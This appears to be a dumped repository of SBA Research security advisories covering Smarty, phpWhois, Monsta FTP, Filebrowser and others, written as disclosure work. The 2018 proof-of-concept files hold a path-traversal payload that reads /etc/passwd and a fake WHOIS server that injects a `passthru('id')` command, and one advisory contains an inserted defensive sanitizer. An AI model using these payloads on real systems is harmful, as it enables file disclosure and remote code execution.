```text
├── 2015
│   ├── RXTEC_20150513
│   │   └── README.md
│   ├── Polycom_20150513
│   │   └── README.md
│   └── knAx_20150101
│       └── README.md
├── 2018
│   ├── SBA-ADV-20180420-01_Smarty_Path_Traversal
│   │   ├── composer.json
│   │   ├── poc.php
│   │   └── README.md
│   ├── SBA-ADV-20180425-01_phpWhois_Code_Execution
│   │   ├── composer.json
│   │   ├── poc.php
│   │   ├── pocserver.py
│   │   └── README.md
│   ├── SBA-ADV-20180410-01_Teltonika_Cross_Site_Scripting
│   │   └── README.md
│   ├── SBA-ADV-20180319-02_Teltonika_Incorrect_Access_Control
│   │   └── README.md
│   └── SBA-ADV-20180319-01_Teltonika_OS_Command_Injection
│       └── README.md
├── 2019
│   ├── SBA-ADV-20191211-01_Monsta_FTP_Stored_XSS
│   │   └── README.md
│   ├── SBA-ADV-20191203-01_Monsta_FTP_Arbitrary_File_Read_and_Write
│   │   └── README.md
│   ├── SBA-ADV-20191203-02_Monsta_FTP_Server-Side_Request_Forgery
│   │   └── README.md
│   ├── SBA-ADV-20190305-01_Ping_Identity_Agentless_Integration_Kit_Reflected_XSS
│   │   └── README.md
│   ├── SBA-ADV-20190911-01_Easy_FancyBox_WP_Plugin_Stored_XSS
│   │   └── README.md
│   ├── SBA-ADV-20190913-01_WordPress_Plugin_EU_Cookie_Law
│   │   └── README.md
│   ├── SBA-ADV-20190913-02_WordPress_Plugin_Broken_Link_Checker
│   │   └── README.md
│   ├── SBA-ADV-20190913-04_WordPress_Plugin_All_in_One_SEO_Pack
│   │   └── README.md
│   └── SBA-ADV-20190913-03_WordPress_Plugin_Events_Manager
│       └── README.md
├── 2020
│   ├── SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure
│   │   └── README.md
│   └── SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands
│       └── README.md
├── 2022
│   ├── SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management
│   │   └── README.md
│   ├── SBA-ADV-20220328-01_Vtiger_CRM_Stored_Cross-Site_Scripting
│   │   └── README.md
│   └── SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
│       └── README.md
├── 2024
│   ├── SBA-ADV-20241209-02_Laravel_Reflected_XSS_via_Route_Parameter_in_Debug-Mode_Error_Page
│   │   └── README.md
│   ├── SBA-ADV-20241209-01_Laravel_Reflected_XSS_via_Request_Parameter_in_Debug-Mode_Error_Page
│   │   └── README.md
│   ├── SBA-ADV-20240202-02_CraftCMS_Plugin_Two-Factor_Authentication_TOTP_Valid_After_Use
│   │   └── README.md
│   ├── SBA-ADV-20240202-01_CraftCMS_Plugin_Two-Factor_Authentication_Password_Hash_Disclosure
│   │   └── README.md
│   ├── SBA-ADV-20240321-01_Paradox_Cross_Site_Request_Forgery
│   │   └── README.md
│   └── SBA-ADV-20240617-01_CraftCMS_TOTP_Valid_After_Use
│       └── README.md
├── 2025
│   ├── SBA-ADV-20250325-04_Filebrowser_Stored_XSS
│   │   ├── images
│   │   │   └── xss_executed.png
│   │   └── README.md
│   ├── SBA-ADV-20250730-01_Checkmk_Path_Traversal
│   │   └── images
│   │       ├── schedule_new.png
│   │       ├── schedule_execute.png
│   │       ├── schedule_path_traversal.png
│   │       └── schedule_path_traversal_2.png
│   ├── SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting
│   │   ├── images
│   │   │   ├── xss_in_dom.png
│   │   │   ├── xss_escaped.png
│   │   │   ├── xss_executed.png
│   │   │   └── rce_via_admin_session.png
│   │   └── README.md
│   ├── SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash
│   │   ├── images
│   │   │   ├── Certificate Error.png
│   │   │   └── Security Warning.png
│   │   └── README.md
│   ├── SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling
│   │   ├── images
│   │   │   ├── Security Warning.png
│   │   │   ├── Certificate Error.png
│   │   │   └── Windows Certificate Store.png
│   │   └── README.md
│   ├── SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist
│   │   ├── images
│   │   │   ├── allowlistbypass_exploit.png
│   │   │   └── allowlistbypass_configuration.png
│   │   └── README.md
│   ├── SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable
│   │   ├── images
│   │   │   └── filebrowser_sharedialog.png
│   │   └── README.md
│   ├── SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands
│   │   ├── images
│   │   │   └── execute_subcommand_with_find.png
│   │   └── README.md
│   ├── SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling
│   │   ├── images
│   │   │   └── filebrowser_documentation_admincredentials.png
│   │   └── README.md
│   ├── SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope
│   │   ├── images
│   │   │   └── commandexecution_readpasswordhashes.png
│   │   └── README.md
│   ├── SBA-ADV-20250327-03_Filebrowser_Sensitive_Data_Transferred_In_URL
│   │   └── README.md
│   └── SBA-ADV-20250325-03_Filebrowser_Insecure_File_Permissions
│       └── README.md
└── README.md
```

/README.md:
--------------------------------------------------------------------------------
# SBA Research Security Advisories

Security advisories published by [SBA Research](https://www.sba-research.org).
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180420-01_Smarty_Path_Traversal/composer.json:
--------------------------------------------------------------------------------
```json
{
  "require": {
    "smarty/smarty": "3.1.32"
  }
}
```
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/composer.json:
--------------------------------------------------------------------------------
```json
{
  "require": {
    "jsmitty12/phpWhois": "5.0.2"
  }
}
```
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-04_Filebrowser_Stored_XSS/images/xss_executed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-04_Filebrowser_Stored_XSS/images/xss_executed.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_new.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_new.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_in_dom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_in_dom.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_execute.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_execute.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_escaped.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_escaped.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_executed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/xss_executed.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250730-01_Checkmk_Path_Traversal/images/schedule_path_traversal_2.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Certificate Error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Certificate Error.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Security Warning.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-02_Cyberduck_Mountain_Duck_Weak_Hash/images/Security Warning.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/rce_via_admin_session.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/images/rce_via_admin_session.png
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/poc.php:
--------------------------------------------------------------------------------
```php
<?php
// Lines 2-5 of the original file (the Composer autoloader require and the
// creation of the Whois object) were lost when this page was extracted.
$whois->useServer('org', '127.0.0.1:9999');
echo $whois->lookup('example.org');
```
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Security Warning.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Security Warning.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Certificate Error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Certificate Error.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Windows Certificate Store.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling/images/Windows Certificate Store.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_exploit.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_configuration.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/images/allowlistbypass_configuration.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable/images/filebrowser_sharedialog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250327-02_Filebrowser_Password_Protection_Of_Links_Bypassable/images/filebrowser_sharedialog.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands/images/execute_subcommand_with_find.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands/images/execute_subcommand_with_find.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling/images/filebrowser_documentation_admincredentials.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250327-01_Filebrowser_Insecure_Password_Handling/images/filebrowser_documentation_admincredentials.png
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope/images/commandexecution_readpasswordhashes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sbaresearch/advisories/HEAD/2025/SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope/images/commandexecution_readpasswordhashes.png
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180420-01_Smarty_Path_Traversal/poc.php:
--------------------------------------------------------------------------------
```php
<?php
// Lines 2-4 of the original file (the Composer autoloader require and the
// creation of the Smarty object) were lost when this page was extracted.
$smarty->enableSecurity();
// Fails
//$smarty->display('eval:{fetch file="/etc/passwd"}');
// Works
$smarty->display('eval:{fetch file="'.addslashes(getcwd()).'/templates/../../../../../etc/passwd"}');
```
--------------------------------------------------------------------------------
/2018/SBA-ADV-20180425-01_phpWhois_Code_Execution/pocserver.py:
--------------------------------------------------------------------------------
```python
# Python 2 (SocketServer module): a minimal WHOIS responder that answers
# every query with the fixed PoC record below.
import SocketServer

DATA = "Registrant Name: ${passthru('id')}\n"

class WhoisHandler(SocketServer.BaseRequestHandler):
    def handle(self):
        # Read (and ignore) the client's query, then send the canned record.
        self.request.recv(1024)
        print('Request received')
        self.request.sendall(DATA)
        print('Payload sent')

if __name__ == '__main__':
    SocketServer.ThreadingTCPServer.allow_reuse_address = True
    server = SocketServer.ThreadingTCPServer(('127.0.0.1', 9999), WhoisHandler)
    server.serve_forever()
```
--------------------------------------------------------------------------------
/2015/RXTEC_20150513/README.md:
--------------------------------------------------------------------------------
# SQL Injection Vulnerability in RXTEC RXAdmin #

## Vulnerability Overview ##

SQL injection vulnerability in the RXTEC RXAdmin Login Page allows
remote attackers to execute arbitrary SQL commands via several HTTP
parameters.

* **Identifier** : RXTEC_20150513
* **Type of Vulnerability** : SQL injection
* **Software/Product Name** : RXTEC RXAdmin Login
* **Vendor** : RXTEC (www.rxtec.net)
* **Affected Versions** : UPDATE : 06 / 2012
* **Fixed in Version** : *unknown*
* **CVE ID** : CVE-2015-8298
* **Impact** : Critical

## Impact ##

It is possible to extract all information from the database in use by
the application. Depending on the configuration of the SQL server,
arbitrary code execution might be possible.

## Vulnerability Description ##

The following parameters are affected by the vulnerability:

* `/index.htm` (loginpassword parameter)
* `/index.htm` (loginusername parameter)
* `/index.htm` (zusätzlicher parameter)
* `/index.htm` (zusätzlicher parameter)
* `/index.htm` (rxtec cookie)
* `/index.htm` (groupid parameter)

## Proof-of-Concept ##

*none*

## Timeline ##

* `2015-04-30` identification of vulnerability
* `2015-05-11` vendor contact (won't fix because of outdated version)
* `2015-07-14` contact cve-request@mitre.

## Credits ##

* Thomas Konrad ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2015/Polycom_20150513/README.md:
--------------------------------------------------------------------------------
# Polycom BToE Connector Privilege Escalation Vulnerability #

## Vulnerability Overview ##

Polycom BToE Connector up to version 2.3.0 allows unprivileged Windows
users to execute arbitrary code with SYSTEM privileges.

* **Identifier** : Polycom_20150513
* **Type of Vulnerability** : Privilege Escalation
* **Exploitation Vector** : local
* **Software/Product Name** : Polycom BToE Connector
* **Vendor** : Polycom Inc.
* **Affected Versions** : All versions up to and including 2.3.0
* **Fixed in Version** : Version 3.0.0 (released March 2015)
* **CVE ID** : CVE-2015-8300
* **CVSSv2 Vector** : (AV:L/AC:L/Au:S/C:C/I:C/A:N)
* **CVSSv2 Base Score** : 6.2

## Impact ##

Code execution with SYSTEM privileges.

## Vulnerability Description ##

Polycom BToE Connector up to version 2.3.0 allows a local user to gain
local administrator privileges.

The software creates a Windows service running with SYSTEM privileges
using the following file (standard installation path):

```text
C:\program files (x86)\polycom\polycom btoe connector\plcmbtoesrv.exe
```

The default installation allows everyone to replace the `plcmbtoesrv.exe`
file, so an unprivileged user can execute arbitrary commands on the
Windows host with the privileges of the service.

## Proof-of-Concept ##

*none*

## Timeline ##

* `2014-12-19` identification of vulnerability
* `2015-01-01` vendor contacted via customer
* `2015-03-01` vendor released fixed version 3.0.0
* `2015-07-14` contact cve-request@mitre.

## References ##

* Download secure version 3.0.0

## Credits ##

* Severin Winkler ([SBA Research](https://www.sba-research.org/))
* Ulrich Bayer ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2019/SBA-ADV-20191211-01_Monsta_FTP_Stored_XSS/README.md:
--------------------------------------------------------------------------------
# Monsta FTP Stored Cross-Site Scripting #

## Vulnerability Overview ##

Monsta FTP 2.10.1 or below is prone to a stored cross-site scripting
vulnerability in the language setting due to insufficient output encoding.

* **Identifier** : SBA-ADV-20191211-01
* **Type of Vulnerability** : Cross Site Scripting
* **Software/Product Name** : [Monsta FTP](https://www.monstaftp.com/)
* **Vendor** : Monsta Limited
* **Affected Versions** : <= 2.10.1
* **Fixed in Version** : Not yet
* **CVE ID** : CVE-2020-14055
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
* **CVSS Base Score** : 8.2 (High)

## Vendor Description ##

> Monsta FTP is a web-based FTP client, developed in PHP & AJAX, you can
> use to manage your website through your browser, edit code, upload and
> download files, copy/move/delete files and folders - all without
> installing any desktop software.

Source:

## Impact ##

By exploiting the documented vulnerability, an unauthenticated attacker
can store JavaScript code on the server. The Monsta FTP instance
delivers the JavaScript code to each user, and it is then executed in the
user's browser within the origin of the Monsta FTP instance.
This might lead to information leakage such as FTP credentials and can also
affect other applications running within the same origin.

## Vulnerability Description ##

*redacted*

## Proof of Concept ##

*redacted*

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

*redacted*

## Timeline ##

* `2019-12-10`: initial vendor contact
* `2019-12-11`: identification of vulnerability in version 2.10
* `2019-12-14`: vendor released version 2.10.1
* `2019-12-14`: vendor response with security contact
* `2019-12-16`: first try to disclose vulnerability to vendor security contact
* `2020-01-13`: disclosed vulnerability to vendor security contact
* `2020-06-12`: re-test of vulnerability in version 2.10.1
* `2020-06-12`: request CVE from MITRE
* `2020-06-12`: MITRE assigned CVE-2020-14055
* `2020-07-01`: public disclosure with redacted technical details

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2019/SBA-ADV-20191203-01_Monsta_FTP_Arbitrary_File_Read_and_Write/README.md:
--------------------------------------------------------------------------------
# Monsta FTP Arbitrary File Read and Write #

## Vulnerability Overview ##

Monsta FTP 2.10.1 or below allows external control of paths used in
filesystem operations. This allows attackers to read and write arbitrary
local files, which in common deployments lets an attacker gain remote
code execution.

* **Identifier** : SBA-ADV-20191203-01
* **Type of Vulnerability** : External Control of File Name or Path
* **Software/Product Name** : [Monsta FTP](https://www.monstaftp.com/)
* **Vendor** : Monsta Limited
* **Affected Versions** : <= 2.10.1
* **Fixed in Version** : Not yet
* **CVE ID** : CVE-2020-14057
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **CVSS Base Score** : 9.8 (Critical)

## Vendor Description ##

> Monsta FTP is a web-based FTP client, developed in PHP & AJAX, you can
> use to manage your website through your browser, edit code, upload and
> download files, copy/move/delete files and folders - all without
> installing any desktop software.

Source:

## Impact ##

An unauthenticated attacker can read and write arbitrary local files
accessible by the webserver by exploiting the vulnerability documented
in this advisory. Sensitive data such as database credentials might get
exposed through this attack. Moreover, an attacker might gain remote
code execution by uploading PHP scripts to the web root and calling them via
the webserver.

## Vulnerability Description ##

*redacted*

## Proof of Concept ##

*redacted*

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

*redacted*

## Timeline ##

* `2019-12-03`: identification of vulnerability in version 2.10
* `2019-12-10`: initial vendor contact
* `2019-12-14`: vendor released version 2.10.1
* `2019-12-14`: vendor response with security contact
* `2019-12-16`: first try to disclose vulnerability to vendor security contact
* `2020-01-13`: disclosed vulnerability to vendor security contact
* `2020-06-12`: re-test of vulnerability in version 2.10.1
* `2020-06-12`: request CVE from MITRE
* `2020-06-12`: MITRE assigned CVE-2020-14057
* `2020-07-01`: public disclosure with redacted technical details

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2019/SBA-ADV-20191203-02_Monsta_FTP_Server-Side_Request_Forgery/README.md:
--------------------------------------------------------------------------------
# Monsta FTP Server-Side Request Forgery #

## Vulnerability Overview ##

Monsta FTP 2.10.1 or below is prone to a server-side request forgery
vulnerability due to insufficient restriction of the web fetch
functionality. This allows attackers to read arbitrary local files and
interact with arbitrary third-party services.

* **Identifier** : SBA-ADV-20191203-02
* **Type of Vulnerability** : Server-Side Request Forgery (SSRF)
* **Software/Product Name** : [Monsta FTP](https://www.monstaftp.com/)
* **Vendor** : Monsta Limited
* **Affected Versions** : <= 2.10.1
* **Fixed in Version** : Not yet
* **CVE ID** : CVE-2020-14056
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **CVSS Base Score** : 9.8 (Critical)

## Vendor Description ##

> Monsta FTP is a web-based FTP client, developed in PHP & AJAX, you can
> use to manage your website through your browser, edit code, upload and
> download files, copy/move/delete files and folders - all without
> installing any desktop software.

Source:

## Impact ##

An unauthenticated attacker can read arbitrary local files accessible by
the webserver by exploiting the vulnerability documented in this
advisory. Sensitive data such as database credentials might get exposed
through this attack. Moreover, an attacker can interact with arbitrary
third-party services. This might lead to information leakage from or
manipulation of internal services.

## Vulnerability Description ##

*redacted*

## Proof of Concept ##

*redacted*

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

*redacted*

## Timeline ##

* `2019-12-03`: identification of vulnerability in version 2.10
* `2019-12-10`: initial vendor contact
* `2019-12-14`: vendor released version 2.10.1
* `2019-12-14`: vendor response with security contact
* `2019-12-16`: first try to disclose vulnerability to vendor security contact
* `2020-01-13`: disclosed vulnerability to vendor security contact
* `2020-06-12`: re-test of vulnerability in version 2.10.1
* `2020-06-12`: request CVE from MITRE
* `2020-06-12`: MITRE assigned CVE-2020-14056
* `2020-07-01`: public disclosure with redacted technical details

## Credits ##

* David Gnedt ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250325-04_Filebrowser_Stored_XSS/README.md:
--------------------------------------------------------------------------------
# Filebrowser Stored Cross-Site Scripting #

## Vulnerability Overview ##

The Markdown preview function of Filebrowser is vulnerable to *Stored
Cross-Site-Scripting (XSS)*. Any JavaScript code that is part of a Markdown
file uploaded by a user will be executed by the browser.

* **Identifier** : SBA-ADV-20250325-04
* **Type of Vulnerability** : Stored XSS
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.33.6
* **Fixed in Version** : 2.33.7
* **CVE ID** : CVE-2025-52902
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
* **CVSS Base Score** : 7.6 (High)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

A user can upload a malicious Markdown file to the application which can
contain arbitrary HTML code. If another user within the same scope clicks on
that file, a rendered preview is opened. JavaScript code that has been
included will be executed.

Malicious actions that are possible include:

* Obtaining a user's session token
* Elevating the attacker's privileges, if the victim is an administrator
  (e.g., gaining command execution rights)

## Vulnerability Description ##

Most Markdown parsers accept arbitrary HTML in a document and try rendering
it accordingly. For instance, if one creates a file called `xss.md` with the
following content

```markdown
# Hallo

foo


bar
```

bold and italic text will be rendered. Also, the renderer used in Filebrowser
will try to display the image and execute the code in the `onerror` event
handler.

## Proof of Concept ##

The screenshot shows that the code from the file mentioned above has
actually been executed in the victim's browser:

![JavaScript code being executed in the Markdown Preview](images/xss_executed.png)

## Recommended Countermeasures ##

The most thorough fix would be to reconfigure the application's Markdown
parser to ignore all HTML elements and only render rich text which is part of
the Markdown specification. If HTML rendering is considered to be a required
feature, an HTML sanitizer like DOMPurify should be used, preferably in
conjunction with a *Content Security Policy* (CSP).
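As an added illustration of the allowlist approach recommended above (this is not Filebrowser's code and not DOMPurify; it is a minimal sanitizer written for this page using only the Python standard library), the following pass keeps only the tags a Markdown renderer needs, drops every other tag and every attribute not explicitly allowed (so event handlers such as `onerror` never reach the browser), and rejects URL attributes whose scheme is not `http`, `https`, `mailto` or relative. The tag and attribute lists are assumptions chosen for the example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist for this example: the elements ordinary Markdown produces.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "code", "pre", "ul", "ol",
                "li", "h1", "h2", "h3", "h4", "h5", "h6", "blockquote", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" means a relative URL
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style"}          # element and its text go


class AllowlistSanitizer(HTMLParser):
    """Re-serialises HTML, emitting only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0   # > 0 while inside <script> / <style>

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                     # drops on*, style, and everything else
            value = value or ""
            if name in URL_ATTRS:
                # Browsers ignore tabs/newlines inside a scheme ("java\nscript:"),
                # so strip control characters before inspecting it.
                probe = re.sub(r"[\x00-\x20]+", "", value)
                if urlparse(probe).scheme.lower() not in SAFE_SCHEMES:
                    continue                 # drops javascript:, data:, ...
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return                           # unknown tag removed, its text kept
        self.out.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)     # <img .../> is a start tag only

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass                                 # comments are dropped entirely


def sanitize(fragment: str) -> str:
    """Return the allowlisted subset of an HTML fragment as a string."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed stand-in for what a Markdown renderer would emit for a file
# like the xss.md described above: heading, paragraphs, inline HTML and an
# image element carrying an event handler attribute.
RENDERED_MARKDOWN = (
    "<h1>Hallo</h1>\n<p>foo</p>\n<b>bold</b> <i>italic</i>\n"
    '<img src="missing.png" onerror="alert(1)">\n<p>bar</p>'
)


def demo() -> str:
    return sanitize(RENDERED_MARKDOWN)


if __name__ == "__main__":
    print(demo())
```

The sanitized output keeps the heading, bold and italic text and the image reference but no `onerror` attribute; a CSP that disallows inline script would additionally stop any handler a parser bug let through.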

## Timeline ##

* `2025-03-25` Identified the vulnerability in version 2.32.0
* `2025-04-11` Contacted the project
* `2025-04-18` Vulnerability disclosed to the project
* `2025-06-25` Uploaded advisories to the project's GitHub repository
* `2025-06-26` CVE ID assigned by GitHub
* `2025-06-26` Fix released with version 2.33.7
* `2025-06-26` Advisory published by project as `GHSA-4wx8-5gm2-2j97`

## References ##

* DOMPurify:
* GitHub Security Advisory:

## Credits ##

* Mathias Tausig ([SBA Research](https://www.sba-research.org/))
--------------------------------------------------------------------------------
/2025/SBA-ADV-20250327-03_Filebrowser_Sensitive_Data_Transferred_In_URL/README.md:
--------------------------------------------------------------------------------
# Filebrowser Sensitive Data Transferred in URL #

## Vulnerability Overview ##

URLs that are accessed by a user are commonly logged in many locations, both
server- and client-side. It is thus good practice to never transmit any
secret information as part of a URL. Filebrowser violates this
practice, since access tokens are used as GET parameters.

* **Identifier** : SBA-ADV-20250327-03
* **Type of Vulnerability** : Information Disclosure
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.33.8
* **Fixed in Version** : 2.33.9
* **CVE ID** : CVE-2025-52901
* **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
* **CVSS Base Score** : 4.5 (Medium)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

The *JSON Web Token (JWT)* which is used as a session identifier will get
leaked to anyone having access to the URLs accessed by the user. This will
give the attacker full access to the user's account and, in consequence, to
all sensitive files the user has access to.

## Vulnerability Description ##

Sensitive information in URLs is logged by several components (see the
following examples), even if access is protected by TLS.

* The browser history
* The access logs on the affected web server
* Proxy servers or reverse proxy servers
* Third-party servers via the HTTP `Referer` header

In case attackers can access such logs, they can read the included
sensitive data.

## Proof of Concept ##

When a file is downloaded via the web interface, the JWT is part of the URL:

```http
GET /api/raw/testdir/testfile.txt?auth=eyJh[...]_r4EQ HTTP/1.1
Host: filebrowser.local:8080
